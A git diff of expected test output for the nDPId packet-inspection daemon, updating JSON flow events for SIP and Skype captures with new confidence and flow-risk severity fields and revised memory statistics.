-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":82,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1120470796804,"flow_last_seen":1120470882727,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":6275,"flow_avg_l4_payload_len":482,"midstream":0,"ts_msec":1120470899862,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":82,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1120470796804,"flow_last_seen":1120470882727,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":6275,"flow_avg_l4_payload_len":482,"midstream":0,"ts_msec":1120470899862,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1120470985348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985348,"pkt":"ADBUADRWAODtAW69CABFAADIa\/wAAIARFmjAqAEC1PIhJHUwncgAtBjegAhvrgAABNg3lstx1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1REEHBgYEhIeEBQXahMcGAQEBQYBAQAHBQUZEwUbGRATGQUEBAcDAgMDAAACDQ0NAAEDDQwNAAABAgMBBgYBDw4ODAMABwYAAwMGBwEEBgYbHxwRaWBiFREQFGoTFWBpYX10UltZ10dcVlJVREtCdVlzeFp8bmgUag=="}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1120470985418,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985418,"pkt":"ADBUADRWAODtAW69CABFAADIa\/0AAIARFmfAqAEC1PIhJHUwncgAtL+rgAhvrwAABXg3lstxbmgVFGoUFBVpYG5qbG5kbGoWF2xubWBmfn9Fxsnw\/Ofz+uXwy\/H2z83k+sJTdF9CW\/bw8vzg7pfo8ldaT011Z399ZmV0dUN4S0dVQ2dmbWNsZGZkeGRvbxQUbBcRExAXEBwfHRAQFhAQHxwfGR4YEBcSFGxibWNqFRUXbmV3ckDQ93N9fmJnYmoVahcVZUNxWll+YGZ6cnJJZXpgeF1EQg=="}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1120470985421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985421,"pkt":"ADBUADRWAODtAW69CABFAADIa\/4AAIARFmbAqAEC1PIhJHUwncgAtNyMgAhvsAAABhg3lstxcX5wdtbF0Et0dn92T1BB0VhmZ2V\/Z294Y2ZmahQXFhQREBAVb2ZPemVlYWJoYE9\/YWZkcnV4bWwVFRVqZ2xpYn94ZmBnY2F0zfjXdmNiYXhveHJgaW5jUFlwZW1kYWdlamoREhAQEx4fHx0XahRvRl1F3V5ESdbQxFFR39TfQXR\/Z9L15ebs6JeW7+DslJOU6uqUn5CcnJKX+Ofs5+Hg6g=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1120470986363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1120470986363,"pkt":"ADBUADRWAODtAW69CABFAACEbAUAAIARFqPAqAEC1PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAA="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","ndpi": {"proto":"RTCP","breed":"Acceptable","category":"VoIP"}}
-00644{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1120470796804,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":13152,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00644{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1120470796804,"flow_last_seen":1120471065350,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":15550,"flow_avg_l4_payload_len":471,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00646{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00645{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTCP","breed":"Acceptable","category":"VoIP"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120470796804,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":15555,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTCP","breed":"Acceptable","category":"VoIP"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}}
+00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1120470796804,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":13152,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1120470796804,"flow_last_seen":1120471065350,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":15550,"flow_avg_l4_payload_len":471,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120470796804,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":15555,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}}
 00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","total-events-serialized":45}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 112/112
@@ -51,9 +51,9 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4602877 bytes
-~~ total memory freed........: 4602877 bytes
-~~ total allocations/frees...: 99677/99677
+~~ total memory allocated....: 4686518 bytes
+~~ total memory freed........: 4686518 bytes
+~~ total allocations/frees...: 101267/101267
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 158 chars
 ~~ json string max len.......: 1525 chars
diff --git a/test/results/skype-conference-call.pcap.out b/test/results/skype-conference-call.pcap.out
index ad7bbe172..3ed66f911 100644
--- a/test/results/skype-conference-call.pcap.out
+++ b/test/results/skype-conference-call.pcap.out
@@ -1,10 +1,10 @@
 00453{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"skype-conference-call.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1501061916646,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1501061916646,"pkt":"XEl5dU5qxCwDBkn+CABFAACEzEwAAEARWwHAqAIUaC4oMcCC7OIAcIaYAAEAVCESpELFWk\/f3gwyXjBMYMcABgAJZ3BwZTp6V3lrAAAAACQABG7\/\/v+AKgAIAAAAAAC\/QxeAVAABMQAAAIBwAAQAAAADAAgAFMOSZmY4XAmhNOQKDGwu8wYai2KrgCgABB+1m2s="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1501061916653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1501061916653,"pkt":"xCwDBkn+XEl5dU5qCABFAACERTYAAG4RtBdoLigxwKgCFOziwIIAcHm6AAEAVCESpEI8yF2moGJ4zvU2wuEABgAJeld5azpncHBlAAAAACQABG7\/\/v+AKQAIAAAAAAACl5OAVAABMQAAAIBwAAQAAAADAAgAFHnv8xovieyQrsQ6j2MMyqg8GNj1gCgABORvfhY="}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1501061916690,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"ts_msec":1501061916690,"pkt":"XEl5dU5qxCwDBkn+CABFAABkjWYAAEARmgfAqAIUaC4oMcCC7OIAUFnEAQEANCESpEI8yF2moGJ4zvU2wuEAIAAIAAHN8Ek8jHOAcAAEAAAAAwAIABSgsacIkgIOfzKEQbuerkeFTLj204AoAASK\/70B"}
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1501061916646,"flow_last_seen":1501061918151,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":915,"flow_tot_l4_payload_len":31287,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1501061918151,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1501061916646,"flow_last_seen":1501061918151,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":915,"flow_tot_l4_payload_len":31287,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1501061918151,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00170{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 200/200
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4608837 bytes
-~~ total memory freed........: 4608837 bytes
-~~ total allocations/frees...: 99755/99755
+~~ total memory allocated....: 4693790 bytes
+~~ total memory freed........: 4693790 bytes
+~~ total allocations/frees...: 101345/101345
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 175 chars
-~~ json string max len.......: 736 chars
-~~ json string avg len.......: 516 chars
+~~ json string max len.......: 845 chars
+~~ json string avg len.......: 569 chars
diff --git a/test/results/skype.pcap.out b/test/results/skype.pcap.out
index cb7ff4d4e..579169d78 100644
--- a/test/results/skype.pcap.out
+++ b/test/results/skype.pcap.out
@@ -1,74 +1,74 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"skype.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431969641947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969641947,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt5UAAEARP6TAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
